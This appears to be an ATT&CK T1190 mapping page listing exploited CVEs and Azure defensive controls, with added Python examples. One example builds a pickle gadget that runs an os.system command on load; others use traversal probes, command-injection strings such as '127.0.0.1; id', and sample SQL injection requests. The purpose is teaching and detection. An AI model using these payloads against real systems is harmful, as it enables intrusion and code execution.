                              This vulnerability is exploited through improper input validation in Atlassian Confluence, allowing remote attackers to translate arbitrary HTTP parameters into getter/setter sequences via the XWorks2 middleware. This vulnerability enables the creation of unauthorized Confluence administrator accounts and the upload of malicious plugins, granting attackers the ability to modify Java objects at runtime and execute arbitrary code. A nation-state actor known as Storm-0062 has been attributed to exploiting this vulnerability in the wild.
                              References
                              CVE-2021-40655 D-Link DIR-605 Router Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited when an adversary forges a POST request to the /getcfg.php page. The POST request could enable the adversary to obtain username and password information from the router.
                              References
                              CVE-2021-26085 Atlassian Confluence Server Pre-Authorization Arbitrary File Read Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This pre-authorization arbitrary file read vulnerability allows viewing of restricted resources.
                              References
                              CVE-2021-22017 VMware vCenter Server Improper Access Control exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability in Rhttproxy within VMware's vCenter Server arises from an improper implementation of URI normalization. Attackers with network access to port 443 on the vCenter Server exploit this flaw by sending specially crafted requests, allowing them to bypass the proxy mechanism. This exploitation grants unauthorized access to internal endpoints, potentially exposing sensitive information.
                              References
                              CVE-2019-1653 Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2019-1653 is a critical information disclosure vulnerability affecting Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers. This vulnerability allows unauthenticated, remote attackers to access sensitive information from affected devices.
                              References
                              CVE-2013-0631 Adobe ColdFusion Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited via a public-facing application. The adversary can use this vulnerability to gain access to victim host information.
                              References
                              CVE-2009-3960 Adobe BlazeDS Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an XML injection or XML external entity injection. In-the-wild reporting indicates adversaries have used this exploit to establish a web shell on a victim machine. The adversary took actions to cover their tracks, establish persistence, exfiltrate Registry data, escalate privileges, move laterally, disable security software, and install and run ransomware.
                              References
                              CVE-2025-49706 Microsoft SharePoint Improper Authentication Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This improper authentication vulnerability in Microsoft SharePoint allows an attacker to send unauthenticated HTTP POST requests to the endpoint; SharePoint will trust the request if it is constructed correctly. This gives the attacker access to the APIs despite the lack of credentials, as well as the ability to impersonate users and abuse native functionality.
                              References
                              CVE-2024-20353 Cisco ASA and FTD Denial of Service Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated attacker by sending a crafted HTTP request to a vulnerable device's web server. This exploitation is possible due to incomplete error checking when parsing HTTP headers. If successfully exploited, it can cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition. In early 2024, the Cisco Product Security Incident Response Team (PSIRT) identified an attack campaign named ArcaneDoor, which targeted these vulnerabilities to implant malware, execute commands, and potentially exfiltrate data from compromised devices.
                              References
                              CVE-2022-0028 Palo Alto Networks PAN-OS Reflected Amplification Denial-of-Service Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2022-0028 is a reflected amplification Distributed Denial-of-Service (DDoS) vulnerability in Palo Alto's PAN-OS firewall software. Public reports describe attempted exploitation of this vulnerability to produce DDoS attacks.
                              References
                              CVE-2023-3519 Citrix NetScaler ADC and NetScaler Gateway Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows for unauthenticated remote code execution. It can be exploited via an HTTP GET request that triggers a stack buffer overflow. Adversaries have been observed using this exploitation to drop a webshell on a target machine and subsequently discover, collect, and exfiltrate Active Directory data.
                              References
                              CVE-2022-22947 VMware Spring Cloud Gateway Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker via a code injection attack to perform arbitrary remote code execution. CISA has linked this vulnerability to adversary campaigns performed by Andariel to perform cyber espionage via ransomware operations.
                              References
                              CVE-2021-44529 Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited after an adversary sends a maliciously crafted cookie to the client endpoint (/client/index.php) of Ivanti systems that use a malicious version of "csrf-magic", which creates a backdoor into the Ivanti system. An unauthorized user can then execute malicious code stored in the cookie via Ivanti's "nobody" user account.
                              References
                              CVE-2025-49704 Microsoft SharePoint Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              When chained with CVE-2025-49706, this vulnerability allows for an attacker to send a malicious __VIEWSTATE object to the same endpoint that the POST requests were sent to. This exploits a code injection flaw and allows for code execution.
                              References
                              CVE-2025-4428 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              By itself, this exploit requires an authenticated user in order to carry it out. However, when chained with CVE-2025-4427, the attacker achieves unauthenticated remote code execution.
                              References
                              CVE-2022-39197 Fortra Cobalt Strike Teamserver Cross-Site Scripting (XSS) Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker to execute HTML on the Cobalt Strike team server. To exploit this vulnerability, an attacker would inspect a Cobalt Strike payload and modify the username field within the payload to be malformed. This manipulation enables the attacker to execute arbitrary code by setting a malformed username in the Beacon configuration. In a documented cybersecurity incident, a Chinese threat actor leveraged a modified version of Cobalt Strike, known as "Cobalt Strike Cat," which included a patch for CVE-2022-39197. This version was used to establish communication channels with victim systems, perform evasive post-exploitation activities, and maintain persistence.
                              References
                              CVE-2023-46604 Apache ActiveMQ Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who manipulates serialized class types in the OpenWire protocol to run arbitrary shell commands. This allows the adversary to execute remote code, leading to the download and installation of malware, such as the Kinsing malware and cryptocurrency miners, on Linux systems. Additionally, attackers have attempted to deploy ransomware, attributed to the HelloKitty ransomware family, on target systems.
                              References
                              CVE-2023-38203 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a public-facing application. APT groups have used this exploit to deploy webshells.
                              References
                              CVE-2023-29492 Novi Survey Insecure Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-29492 is an insecure deserialization vulnerability. Exploitation of this vulnerability gives remote attackers arbitrary code execution in the context of the service account.
                              References
                              CVE-2023-29300 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a public-facing application. APT groups have used this exploit to deploy webshells.
                              References
                              CVE-2023-26360 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability gives an adversary access through exploitation of a public-facing server.
                              References
                              CVE-2023-26359 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a public-facing server.
                              References
                              CVE-2019-18935 Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2019-18935 is an insecure deserialization vulnerability in Telerik UI, which does not properly sanitize serialized data supplied by the user. It exposes the application to RCE attacks that may lead to a full system compromise.
                              References
                              CVE-2018-4939 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability primary_impact T1190 Exploit Public-Facing Application
                              CVE-2017-9805 Apache Struts Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2017-9805 is a deserialization vulnerability in the Apache Struts REST Plugin that could allow an attacker to execute arbitrary commands remotely on the affected systems by sending a specially crafted web request to the application.
                              References
                              CVE-2025-23006 SonicWall SMA1000 Appliances Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This pre-authentication deserialization vulnerability in SonicWall SMA1000 appliances running version 12.4.3-02804 or earlier allows a remote attacker to execute arbitrary OS commands on the appliance.
                              References
                              CVE-2024-20953 Oracle Agile Product Lifecycle Management (PLM) Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can create a serialized object specifically designed to exploit the deserialization vulnerability, embedding this payload into a request, which is then sent to a WebLogic server, leading to arbitrary code execution.
                              References
                              CVE-2025-53770 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This deserialization vulnerability in Microsoft SharePoint allows an unauthenticated remote attacker to execute code on the server over the network.
                              References
                              CVE-2025-42999 SAP NetWeaver Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This deserialization vulnerability in NetWeaver Visual Composer, when chained with CVE-2025-31324, allows an attacker to achieve unauthenticated remote code execution with administrator privileges, leading to consequences such as web shell deployment.
                              References
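The deserialization entries above (ActiveMQ, ColdFusion, Novi Survey, Telerik, Struts, SonicWall, WebLogic, SharePoint, SAP NetWeaver) share one root cause: the server rebuilds objects from bytes the client controls, and the object graph can name a callable to invoke during loading. The following is an added illustration in Python, not code from any of the products listed or from this page: it constructs a pickle payload that would invoke `os.system` on load (a harmless `echo`), inspects the stream statically to list the globals it references, and shows a restricted unpickler that allowlists the one type the application needs. The `EvilOnLoad` class, the allowlist contents and the sample objects are all assumptions made for the example.

```python
import io
import os
import pickle
import pickletools
from collections import OrderedDict
from typing import List, Tuple


class EvilOnLoad:
    """Constructed payload object (hypothetical, for the example). Pickling it
    only records a call to os.system; pickle.loads() would invoke os.system
    when it rebuilds the object. The command is a harmless echo."""

    def __reduce__(self):
        return (os.system, ("echo deserialization-gadget-ran",))


def build_untrusted_payload() -> bytes:
    # Serialization records the callable and its argument; nothing runs here.
    return pickle.dumps(EvilOnLoad())


def benign_payload() -> bytes:
    # Something the application legitimately exchanges. It references the
    # global collections.OrderedDict, so the allowlist below is exercised.
    return pickle.dumps(OrderedDict([("a", 1)]))


def unsafe_load(data: bytes):
    # The vulnerable pattern: deserialize whatever the client sent.
    # Calling this on build_untrusted_payload() executes the echo command.
    return pickle.loads(data)


def referenced_globals(data: bytes) -> List[Tuple[str, str]]:
    """Static inspection: list every (module, name) the stream will import,
    without executing it. GLOBAL carries "module name" as its argument;
    STACK_GLOBAL (protocol 4+) consumes the two preceding string operands."""
    refs: List[Tuple[str, str]] = []
    recent_strings: List[str] = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            refs.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return refs


class RestrictedUnpickler(pickle.Unpickler):
    # Allowlist of globals the application actually needs. Everything else,
    # including posix.system / nt.system, is refused before it is imported.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_load_rejects(data: bytes) -> bool:
    """True if the restricted loader refuses the stream."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    payload = build_untrusted_payload()
    print("globals referenced:", referenced_globals(payload))
    print("restricted loader rejects gadget:", safe_load_rejects(payload))
    print("restricted loader accepts benign:", safe_load(benign_payload()))
```

`referenced_globals` is the detection-side half: run it over a captured request body and any module/name pair outside what the application is expected to exchange is a strong indicator, whether or not the loader on the server is already hardened.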
                              CVE-2023-36851 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is a Missing Authentication for Critical Function weakness in Juniper Networks Junos OS on SRX Series devices. An attacker sends a crafted request to the `webauth_operation.php` endpoint, which does not require authentication, causing a limited loss of file system integrity that can enable further exploitation.
                              References
                              CVE-2023-36847 Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is a Missing Authentication for Critical Function weakness in Juniper Networks Junos OS on EX Series devices. An attacker sends a crafted request to the `installAppPackage.php` endpoint, which does not require authentication, to upload arbitrary files via J-Web. This causes a loss of integrity for part of the file system and allows the vulnerability to be chained with others, potentially leading to further exploitation.
                              References
                              CVE-2023-36846 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is a Missing Authentication for Critical Function weakness. An attacker sends a crafted request to the `user.php` endpoint, which does not require authentication, to upload arbitrary files. This can be chained with other vulnerabilities, potentially leading to unauthenticated remote code execution.
                              References
                              CVE-2023-35081 Ivanti Endpoint Manager Mobile (EPMM) Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is a path traversal flaw in Ivanti EPMM. An attacker with authenticated administrative access can remotely write arbitrary files onto the server, enabling deployment of additional payloads and further compromise of the system. It is often chained with CVE-2023-35078 (among others), which provides the unauthenticated access, and the pair has been actively exploited together against victims.
                              References
                              CVE-2018-13379 Fortinet FortiOS SSL VPN Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is a path traversal vulnerability that allows an adversary to download system files through specially crafted HTTP requests.
                              References
                              CVE-2013-0629 Adobe ColdFusion Directory Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is an exploitation of a public-facing server that results from a password misconfiguration. Exploitation allows attackers to access restricted directories.
                              References
                              CVE-2010-2861 Adobe ColdFusion Directory Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is the exploitation of a public-facing server. In-the-wild reporting documents that exploitation of this vulnerability was used to install a webshell on the victim machine and then to capture and exfiltrate client credit card information.
                              References
                              CVE-2024-57727 SimpleHelp Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to improper handling of HTTP request input, attackers can exploit a path traversal vulnerability in SimpleHelp version 5.5.7 and prior to read sensitive data stored by SimpleHelp, such as credentials. With those credentials they can further compromise the system, for example by achieving code execution.
                              References
                              CVE-2024-55550 Mitel MiCollab Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to improper input sanitization, a user with administrative credentials can access and read arbitrary files on the MiCollab server.
                              References
                              CVE-2024-48248 NAKIVO Backup and Replication Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An unauthenticated attacker can send a request to the NAKIVO Backup & Replication endpoint that contains a path to a sensitive file, leading to arbitrary file read.
                              References
                              CVE-2024-13161 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can exploit this vulnerability to coerce the EPM server into a credential relay attack and gain access to sensitive information.
                              References
                              CVE-2024-13160 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can exploit this vulnerability to coerce the EPM server into a credential relay attack and gain access to sensitive information.
                              References
                              CVE-2024-13159 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can exploit this vulnerability to coerce the EPM server into a credential relay attack and gain access to sensitive information.
                              References
                              CVE-2024-0769 D-Link DIR-859 Router Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This path traversal vulnerability in D-Link DIR-859 WiFi routers can lead to information disclosure, such as configuration files. As these devices are end-of-life, the manufacturer has no intention of patching this.
                              References
                              CVE-2023-38950 ZKTeco BioTime Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This directory traversal vulnerability, if exploited using a malicious payload in an HTTP GET request, allows an unauthenticated attacker to access and read arbitrary files, leading to potential exfiltration/disclosure.
                              References
                              CVE-2017-12637 SAP NetWeaver Directory Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              By exploiting this vulnerability in SAP NetWeaver Java, an attacker can inject directory traversal sequences and navigate the file system beyond the intended scope. This can lead to the discovery of password stores and information about the host system, which can be used in further attacks.
                              References
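The path traversal entries above fall into two variants: relative traversal, where `../` sequences walk out of the intended directory (FortiOS, ColdFusion, SimpleHelp, ZKTeco, SAP NetWeaver), and absolute path traversal, where the client supplies a full path that replaces the intended root (NAKIVO, Ivanti EPM). The following is an added example, not code from any of these products or from this page, written in Python against an assumed document root `/srv/app/public`. It shows the flawed join-and-use pattern next to a resolver that confines the result to the root, covering `../`, absolute paths, backslashes, single and double URL-encoding and NUL bytes. It works on path strings only, so it runs without touching the filesystem.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the example (hypothetical path).
BASE_DIR = "/srv/app/public"


def vulnerable_resolve(user_path: str) -> str:
    """The flawed pattern behind the entries above: join the client-supplied
    path onto the document root and use whatever results. "../" walks out of
    BASE_DIR, and an absolute path makes posixpath.join discard BASE_DIR
    entirely (the 'absolute path traversal' variant)."""
    return posixpath.normpath(posixpath.join(BASE_DIR, user_path))


def safe_resolve(user_path: str) -> Optional[str]:
    """Return the absolute path inside BASE_DIR, or None if the request would
    escape it. Handles relative (../) and absolute traversal, backslashes,
    single and double URL-encoding, and embedded NUL bytes."""
    decoded = unquote(unquote(user_path))   # collapse %2e%2e and %252e%252e
    if "\x00" in decoded:
        return None                          # NUL truncation in C-backed opens
    decoded = decoded.replace("\\", "/")     # treat backslash as a separator
    # Dropping leading slashes keeps posixpath.join anchored to BASE_DIR
    # instead of letting an absolute path replace it.
    relative = decoded.lstrip("/")
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, relative))
    # commonpath, not startswith: "/srv/app/public_old" starts with BASE_DIR
    # but is not inside it.
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    # On a live system, also realpath() the opened file so a symlink inside
    # BASE_DIR cannot point outside it.
    return candidate


if __name__ == "__main__":
    for probe in ["images/logo.png", "../../../etc/passwd", "/etc/passwd",
                  "css/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "..\\..\\win.ini"]:
        print(f"{probe!r:45} vulnerable={vulnerable_resolve(probe)!r:30} "
              f"safe={safe_resolve(probe)!r}")
```

The same decode-normalise-confine sequence is what a WAF or log-review rule should apply before matching, since a single `../` regex misses the encoded and backslash forms that several of the listed CVEs were exploited with.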
                              CVE-2021-36380 Sunhillo SureLine OS Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              To trigger this vulnerability, an attacker sends a specially crafted POST request to the webserver at the URL /cgi/networkDiag.cgi. Within this request, the attacker inserts a Linux command as part of the ipAddr or dnsAddr POST parameters. When the webserver processes the POST request, the command the attacker has inserted into the parameter will be executed.
                              References
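The SureLine entry above describes the classic shape of OS command injection: a diagnostic CGI takes an address parameter and hands it to a shell. As an added example, not SureLine's code and not from this page, the following Python shows the vulnerable interpolation pattern beside two hardened builders, one for an IP parameter (validated with `ipaddress`) and one for a hostname parameter (validated with a strict syntax check), each producing an argv list that never passes through a shell. The parameter names `ipAddr`/`dnsAddr` are taken from the entry; the handler functions, regex and `nslookup`/`ping` commands are assumptions for the example.

```python
import ipaddress
import re
import subprocess
from typing import Callable, List

# RFC 1123-style hostname: labels of letters/digits/hyphens, dot-separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(ip_addr: str) -> str:
    """The flawed pattern: interpolate the ipAddr POST parameter into a shell
    string. Run with shell=True, '127.0.0.1; id' executes 'id' as the web
    server's user."""
    return f"ping -c 1 {ip_addr}"


def hardened_ip_argv(ip_addr: str) -> List[str]:
    """Validate ipAddr as an IP literal and build an argv list, so the value
    is a single argument and no shell ever parses it."""
    parsed = ipaddress.ip_address(ip_addr.strip())   # ValueError otherwise
    return ["ping", "-c", "1", str(parsed)]


def hardened_dns_argv(host: str) -> List[str]:
    """Same for the dnsAddr parameter: strict hostname syntax, then argv."""
    host = host.strip()
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"not a hostname: {host!r}")
    return ["nslookup", host]


def is_rejected(builder: Callable[[str], List[str]], value: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        builder(value)
    except ValueError:
        return True
    return False


def looks_injected(value: str) -> bool:
    """Detection-side check for a WAF rule or log review: shell metacharacters
    that have no place in an address field."""
    return re.search(r"[;&|`$\n\r<>]", value) is not None


def run_hardened(ip_addr: str) -> int:
    # The argv list goes straight to execve; nothing interprets ';' or '|'.
    proc = subprocess.run(hardened_ip_argv(ip_addr), check=False,
                          capture_output=True)
    return proc.returncode


if __name__ == "__main__":
    for value in ["127.0.0.1", "127.0.0.1; id", "$(id)"]:
        print(f"{value!r:20} shell string: {vulnerable_command(value)!r:32} "
              f"rejected by hardened builder: {is_rejected(hardened_ip_argv, value)}")
```

Validation by type (an IP address parses or it does not) is stronger than escaping, because it leaves no room for the quoting mistakes that `shlex.quote`-style fixes tend to reintroduce.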

                              VERIS Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              action.hacking.variety.Exploit misconfig Exploit a misconfiguration (vs vuln or weakness) related-to T1190 Exploit Public-Facing Application
                              action.hacking.variety.SQLi SQL injection. Child of 'Exploit vuln'. related-to T1190 Exploit Public-Facing Application

                              Azure Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              microsoft_sentinel Microsoft Sentinel technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              The Microsoft Sentinel Hunting "Potential IIS code injection attempt" query can detect some potential injection attacks against public-facing applications. The Microsoft Sentinel Analytics "A potentially malicious web request was executed against a web server" query can detect a high ratio of blocked requests to unobstructed requests at a Web Application Firewall (WAF) for a given client IP and hostname. The coverage of these queries is minimal (e.g. IIS only), resulting in an overall Minimal score.
                              References
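The Sentinel analytics rule described above works on a simple idea: a client whose requests are mostly blocked by the WAF, but not all of them, is probing, and the request that got through is the one to look at. As an added example in Python, not Sentinel's KQL and not content from this page, the following computes that per-client, per-hostname ratio over constructed WAF log lines and returns the allowed requests for any client it flags. The log format, thresholds and sample lines are all assumptions made for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample, not real traffic: "<client_ip> <host> <action> <path>"
SAMPLE_LOG = """\
203.0.113.7 shop.example.net Blocked /index.php?id=1%27%20OR%201%3D1--
203.0.113.7 shop.example.net Blocked /index.php?id=1%20UNION%20SELECT%20null--
203.0.113.7 shop.example.net Blocked /static/../../../etc/passwd
203.0.113.7 shop.example.net Blocked /cgi-bin/diag.cgi?ip=127.0.0.1;id
203.0.113.7 shop.example.net Allowed /index.php?id=1%27/**/OR/**/1%3D1--
198.51.100.2 shop.example.net Allowed /
198.51.100.2 shop.example.net Allowed /products?page=2
198.51.100.2 shop.example.net Blocked /search?q=%3Cscript%3E
192.0.2.9 api.example.net Blocked /v1/users?id=1%27
192.0.2.9 api.example.net Blocked /v1/users?id=1%22
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (Allowed|Blocked) (\S+)$")
Record = Tuple[str, str, str, str]   # (client_ip, host, action, path)


def parse(log_text: str) -> List[Record]:
    """Parse the simplified log; lines that do not match are skipped."""
    records: List[Record] = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if match:
            records.append(match.groups())   # type: ignore[arg-type]
    return records


def counts_by_client(records: List[Record]) -> Dict[Tuple[str, str], List[int]]:
    """(client_ip, host) -> [blocked, allowed]"""
    counts: Dict[Tuple[str, str], List[int]] = defaultdict(lambda: [0, 0])
    for ip, host, action, _path in records:
        counts[(ip, host)][0 if action == "Blocked" else 1] += 1
    return counts


def suspicious_clients(records: List[Record], min_requests: int = 3,
                       min_ratio: float = 0.75) -> List[Tuple[str, str]]:
    """Flag (client_ip, host) pairs where most requests were blocked but at
    least one was allowed: the blocked requests show intent, the allowed one
    may be the variant that slipped past the rule set."""
    flagged = []
    for key, (blocked, allowed) in counts_by_client(records).items():
        total = blocked + allowed
        if total >= min_requests and allowed >= 1 and blocked / total >= min_ratio:
            flagged.append(key)
    return sorted(flagged)


def allowed_requests_for(records: List[Record], client_ip: str,
                         host: str) -> List[str]:
    """The analyst's next pivot: what did this client get through?"""
    return [path for ip, h, action, path in records
            if ip == client_ip and h == host and action == "Allowed"]


if __name__ == "__main__":
    recs = parse(SAMPLE_LOG)
    for ip, host in suspicious_clients(recs):
        print(f"{ip} -> {host}: allowed {allowed_requests_for(recs, ip, host)}")
```

In the sample, `203.0.113.7` is blocked four times and then gets a comment-obfuscated SQL injection variant through, which is exactly the case the ratio rule is meant to surface; `192.0.2.9` is fully blocked and never reaches the minimum request count, so it is left to the WAF's own reporting.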
                              devops_security Microsoft Defender for Cloud: DevOps Security technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This capability can protect against exploitation of public facing applications by ensuring application security is baked into DevOps.
                              References
                              advanced_threat_protection_for_azure_sql_database Advanced Threat Protection for Azure SQL Database technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may alert on malformed SQL statements issued through an application, which can indicate an attempted SQL injection. Alerts may not be generated when attackers use syntactically valid SQL statements for malicious purposes.
                              References
                              ai_security_recommendations Microsoft Defender for Cloud: AI Security Recommendations technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control's CORS related recommendations can help lead to hardened web applications. This can reduce the likelihood of an application being exploited to reveal sensitive data that can lead to the compromise of an environment. Likewise this control's recommendations related to keeping Java/PHP up to date for API/Function/Web apps can lead to hardening the public facing content that uses these runtimes. This control's recommendations related to disabling Public network access for Azure databases can lead to reducing the exposure of resources to the public Internet and thereby reduce the attack surface. These recommendations are limited to specific technologies (Java, PHP and CORS, SQL DBs) and therefore provide Minimal coverage leading to a Minimal score.
                              References
                              alerts_for_windows_machines Alerts for Windows Machines technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control's Fileless Attack Detection identifies shellcode executing within process memory, including shellcode executed as a payload in the exploitation of a software vulnerability. Detection is periodic at an unknown rate. The following alerts may be generated: "Fileless attack technique detected", "Fileless attack behavior detected", "Fileless attack toolkit detected", "Suspicious SVCHOST process executed".
                              References
                              azure_network_watcher_traffic_analytics Azure Network Watcher: Traffic Analytics technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can detect anomalous traffic to and from externally facing systems with respect to network security group (NSG) policy.
                              References
                              azure_policy Azure Policy technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may provide recommendations to restrict access to applications that are public-facing and provide information on vulnerable applications.
                              References
                              azure_update_manager Azure Update Manager technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control provides partial coverage for techniques that exploit vulnerabilities in (common) unpatched software since it enables automated updates of software and rapid configuration change management.
                              References
                              azure_web_application_firewall Azure Web Application Firewall technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can detect common web application attack vectors.
                              References
                              azure_web_application_firewall Azure Web Application Firewall technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can protect web applications from common attacks (e.g. SQL injection, XSS).
                              References
                              defender_for_app_service Microsoft Defender for Cloud: Defender for App Service technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control's Fileless Attack Detection identifies shellcode executing within process memory, including shellcode injected to exploit a vulnerability in a public-facing application. Detection is periodic at an unknown rate.
                              References
                              defender_for_azure_sql_databases Microsoft Defender for Azure SQL Databases technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control provides recommendations to patch if SQL server is out of date and to disable unneeded features to reduce exploitable surface area.
                              References
                              defender_for_containers Microsoft Defender for Containers technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may provide information about vulnerabilities within container images. The limited scope of containers and registries that are applicable to this control contributes to the lower score.
                              References
                              defender_for_containers Microsoft Defender for Containers technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may alert on publicly exposed Kubernetes services. This may provide context on services that should be patched or hardened for public access.
                              References
                              defender_for_open_source_databases Microsoft Defender for Open-Source Relational Databases technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can detect artifacts of common exploit traffic.
                              References
                              just-in-time_vm_access Microsoft Defender for Cloud: Just-in-Time VM Access technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can be configured to completely block inbound access to selected ports until access is requested. This prevents any attempt to exploit a public-facing application unless the attacker has the credentials and permissions to request such access. Even when an authorized user has been granted access to the virtual machine, a list of authorized IP addresses for that access can be configured. The score is Minimal, since this control only applies to specific applications requiring credentialed access, as opposed to a public web server.
                              References
                              vulnerability_management Microsoft Defender for Cloud: Vulnerability Management technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Once this control is deployed, it can detect known vulnerabilities in Windows and various Linux endpoints. This information can be used to patch, isolate, or remove vulnerable software and machines. This control does not directly protect against exploitation and it is not effective against zero day attacks, vulnerabilities with no available patch, and software that may not be analyzed by the scanner. As a result, the score is capped at Partial.
                              References

                              GCP Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
